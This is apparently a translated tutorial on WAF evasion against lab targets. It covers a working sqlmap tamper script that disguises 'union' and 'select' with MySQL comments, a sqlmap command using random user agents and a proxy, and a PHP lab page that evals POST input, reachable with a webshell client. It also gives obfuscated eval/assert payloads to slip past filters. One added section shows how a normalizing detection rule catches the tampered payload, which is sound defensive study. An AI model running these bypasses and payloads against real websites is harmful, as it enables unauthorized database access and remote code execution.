WAF Bypass: Exploit-Time Bypasses for Injection, Upload, XSS and More


SQL Injection

The injection point under test


sqlmap -u "http://192.168.50.10:83/Less-1/?id=*"

If a firewall (WAF) is deployed in front of the target, certain SQL syntax will be blocked and must be rewritten to get past it.

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH

def tamper(payload, **kwargs):
    # Rewrite the payload so the WAF's keyword signatures no longer match,
    # while MySQL still parses it: "%23a%0a" is "#a" plus a newline, i.e. a
    # MySQL line comment that the parser skips.
    if payload:
        payload = payload.replace("union", "%23a%0aunion")
        # /*!NNNNN ... */ is a MySQL version comment; the body is executed
        # on any server newer than version 4.45.75, so on every 5.x+ server.
        payload = payload.replace("select", "/*!44575select*/")
        payload = payload.replace("%20", "%23a%0a")
        payload = payload.replace(" ", "%23a%0a")
        payload = payload.replace("database()", "database%23a%0a()")
    return payload

  • Scripts placed in sqlmap's tamper directory can replace the blocked keywords like this.


  • If requests are being blocked because they arrive too fast, try a proxy pool (here Burp is used to inspect the packets)
  • Firewall filtering rules can be bypassed with a tamper script that rewrites the keywords
  • A random User-Agent can be used to evade detection
sqlmap -u "http://192.168.50.10:83/Less-2/?id=*" --tamper=safedog.py --random-agent --proxy=http://127.0.0.1:8080 --batch
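From the defender's side, the tamper above works only against rules that match the raw query string. The following added example (not from the original page or from sqlmap) reproduces the page's substitutions, shows that a literal "union select" rule misses the tampered payload, and shows that the same rule fires again once the input is percent-decoded and MySQL comments are stripped; the sample payload is constructed.

```python
import re
from urllib.parse import unquote

# Substitutions from the page's safedog.py tamper, reproduced here so the
# example runs stand-alone without importing sqlmap.
def tamper(payload: str) -> str:
    payload = payload.replace("union", "%23a%0aunion")
    payload = payload.replace("select", "/*!44575select*/")
    payload = payload.replace("%20", "%23a%0a")
    payload = payload.replace(" ", "%23a%0a")
    payload = payload.replace("database()", "database%23a%0a()")
    return payload

# A naive WAF rule: the keyword pair separated by whitespace, on raw input.
NAIVE_RULE = re.compile(r"union\s+select", re.IGNORECASE)

def naive_match(raw_query: str) -> bool:
    return NAIVE_RULE.search(raw_query) is not None

# Normalization before matching: percent-decode, strip '#' and '-- ' line
# comments, unwrap /*!NNNNN ... */ version comments (MySQL executes their
# body), drop ordinary /* ... */ comments, collapse whitespace, lowercase.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
HASH_COMMENT = re.compile(r"#[^\n]*\n")
DASH_COMMENT = re.compile(r"--\s[^\n]*\n")

def normalize(raw_query: str) -> str:
    s = unquote(raw_query)
    s = HASH_COMMENT.sub(" ", s)
    s = DASH_COMMENT.sub(" ", s)
    s = VERSION_COMMENT.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def normalized_match(raw_query: str) -> bool:
    return NAIVE_RULE.search(normalize(raw_query)) is not None

if __name__ == "__main__":
    sample = "-1' union select 1,database(),3"   # constructed sample payload
    evaded = tamper(sample)
    print("tampered:", evaded)
    print("naive rule:", naive_match(evaded))          # False
    print("normalized rule:", normalized_match(evaded))  # True
```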


File Upload

For file upload bypasses, refer to the material covered earlier.

RCE (Remote Command Execution)

Viewing the source code

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "rce_evel.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';

$html='';
if(isset($_POST['submit']) && $_POST['txt'] != null){
    if(@!eval($_POST['txt'])){
        $html.="<p>你喜欢的字符还挺奇怪的!</p>";

    }

}
?>

This can be connected to directly with a webshell client such as China Chopper (菜刀). If a firewall is present it may intercept the injected statement; try the following payloads to get past it:

# does not work in PHP 7.1
assert(str_replace('x','','pxhpxinxfo();'));

eval(str_replace('x','','pxhpxinxfo();'));
